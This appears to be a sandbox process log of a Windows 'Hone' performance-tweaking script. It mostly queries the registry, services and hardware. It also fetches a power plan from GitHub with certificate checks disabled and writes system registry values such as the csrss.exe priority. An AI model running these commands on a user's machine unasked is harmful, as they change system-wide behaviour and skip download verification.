reg query "HKCU\Software\Hone" /v "AllGPUTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NpiTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "TCPIP"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NvidiaTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MemoryTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "InternetTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "ServicesTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "DebloatTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MitigationsTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AffinityTweaks"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"

C:\Windows\system32\reg.exe

reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"

C:\Windows\system32\find.exe

find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"

C:\Windows\system32\reg.exe

reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"

C:\Windows\system32\find.exe

find "0x400"

C:\Windows\system32\sc.exe

sc query STR

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\system32\sc.exe

sc query HoneAudio

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_Battery Get BatteryStatus

C:\Windows\system32\find.exe

find "1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GeForce"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "NVIDIA"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "RTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "AMD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Ryzen"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Intel"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "UHD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo OFF "

C:\Windows\system32\find.exe

find "N/A"

C:\Windows\system32\curl.exe

curl -g -k -L -# -o "C:\Hone\Resources\HoneV2.pow" "https://github.com/auraside/HoneCtrl/raw/main/Files/HoneV2.pow"

C:\Windows\system32\powercfg.exe

powercfg /d 44444444-4444-4444-4444-444444444449

C:\Windows\system32\powercfg.exe

powercfg -import "C:\Hone\Resources\HoneV2.pow" 44444444-4444-4444-4444-444444444449

C:\Windows\system32\powercfg.exe

powercfg /changename 44444444-4444-4444-4444-444444444449 "Hone Ultimate Power Plan V2" "The Ultimate Power Plan to increase FPS, improve latency and reduce input lag."

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic cpu get numberOfCores /value

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get numberOfCores /value

C:\Windows\system32\powercfg.exe

powercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 0

C:\Windows\system32\powercfg.exe

powercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 0

C:\Windows\system32\powercfg.exe

powercfg -setactive "44444444-4444-4444-4444-444444444449"

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_NetworkAdapter get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value

C:\Windows\System32\Wbem\WMIC.exe

wmic os get TotalVisibleMemorySize /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NVTTweaks"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"

C:\Windows\system32\findstr.exe

findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass

C:\Windows\system32\find.exe

find "0x4"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority

C:\Windows\system32\find.exe

find "0x3"

C:\Windows\system32\powercfg.exe

powercfg /GetActiveScheme

C:\Windows\system32\find.exe

find "Hone"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AllGPUTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NpiTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "TCPIP"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NvidiaTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MemoryTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "InternetTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "ServicesTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "DebloatTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MitigationsTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AffinityTweaks"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"

C:\Windows\system32\reg.exe

reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"

C:\Windows\system32\find.exe

find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"

C:\Windows\system32\reg.exe

reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"

C:\Windows\system32\find.exe

find "0x400"

C:\Windows\system32\sc.exe

sc query STR

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\system32\sc.exe

sc query HoneAudio

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_Battery Get BatteryStatus

C:\Windows\system32\find.exe

find "1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GeForce"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "NVIDIA"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "RTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "AMD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Ryzen"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Intel"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "UHD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo OFF "

C:\Windows\system32\find.exe

find "N/A"

C:\Windows\system32\curl.exe

curl -g -k -L -# -o "C:\Hone\Resources\HoneV2.pow" "https://github.com/auraside/HoneCtrl/raw/main/Files/HoneV2.pow"

C:\Windows\system32\powercfg.exe

powercfg /d 44444444-4444-4444-4444-444444444449

C:\Windows\system32\powercfg.exe

powercfg -import "C:\Hone\Resources\HoneV2.pow" 44444444-4444-4444-4444-444444444449

C:\Windows\system32\powercfg.exe

powercfg /changename 44444444-4444-4444-4444-444444444449 "Hone Ultimate Power Plan V2" "The Ultimate Power Plan to increase FPS, improve latency and reduce input lag."

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic cpu get numberOfCores /value

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get numberOfCores /value

C:\Windows\system32\powercfg.exe

powercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 1

C:\Windows\system32\powercfg.exe

powercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 0

C:\Windows\system32\powercfg.exe

powercfg -setactive "44444444-4444-4444-4444-444444444449"

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_NetworkAdapter get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value

C:\Windows\System32\Wbem\WMIC.exe

wmic os get TotalVisibleMemorySize /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NVTTweaks"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"

C:\Windows\system32\findstr.exe

findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass

C:\Windows\system32\find.exe

find "0x4"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority

C:\Windows\system32\find.exe

find "0x3"

C:\Windows\system32\powercfg.exe

powercfg /GetActiveScheme

C:\Windows\system32\find.exe

find "Hone"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AllGPUTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NpiTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "TCPIP"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NvidiaTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MemoryTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "InternetTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "ServicesTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "DebloatTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MitigationsTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AffinityTweaks"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"

C:\Windows\system32\reg.exe

reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"

C:\Windows\system32\find.exe

find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"

C:\Windows\system32\reg.exe

reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"

C:\Windows\system32\find.exe

find "0x400"

C:\Windows\system32\sc.exe

sc query STR

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\system32\sc.exe

sc query HoneAudio

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_Battery Get BatteryStatus

C:\Windows\system32\find.exe

find "1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GeForce"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "NVIDIA"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "RTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "AMD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Ryzen"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Intel"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "UHD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value

C:\Windows\System32\Wbem\WMIC.exe

wmic os get TotalVisibleMemorySize /value

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB" /t REG_DWORD /d 5217772 /f

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_NetworkAdapter get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value

C:\Windows\System32\Wbem\WMIC.exe

wmic os get TotalVisibleMemorySize /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NVTTweaks"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"

C:\Windows\system32\findstr.exe

findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass

C:\Windows\system32\find.exe

find "0x4"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority

C:\Windows\system32\find.exe

find "0x3"

C:\Windows\system32\powercfg.exe

powercfg /GetActiveScheme

C:\Windows\system32\find.exe

find "Hone"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AllGPUTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NpiTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "TCPIP"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NvidiaTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MemoryTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "InternetTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "ServicesTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "DebloatTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MitigationsTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AffinityTweaks"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"

C:\Windows\system32\reg.exe

reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"

C:\Windows\system32\find.exe

find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"

C:\Windows\system32\reg.exe

reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"

C:\Windows\system32\find.exe

find "0x400"

C:\Windows\system32\sc.exe

sc query STR

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\system32\sc.exe

sc query HoneAudio

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_Battery Get BatteryStatus

C:\Windows\system32\find.exe

find "1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GeForce"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "NVIDIA"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "RTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "AMD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Ryzen"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Intel"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "UHD"

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass /t Reg_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority /t Reg_DWORD /d "3" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "NoLazyMode" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "AlwaysOn" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "NetworkThrottlingIndex" /t REG_DWORD /d "10" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "SystemResponsiveness" /t REG_DWORD /d "0" /f

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

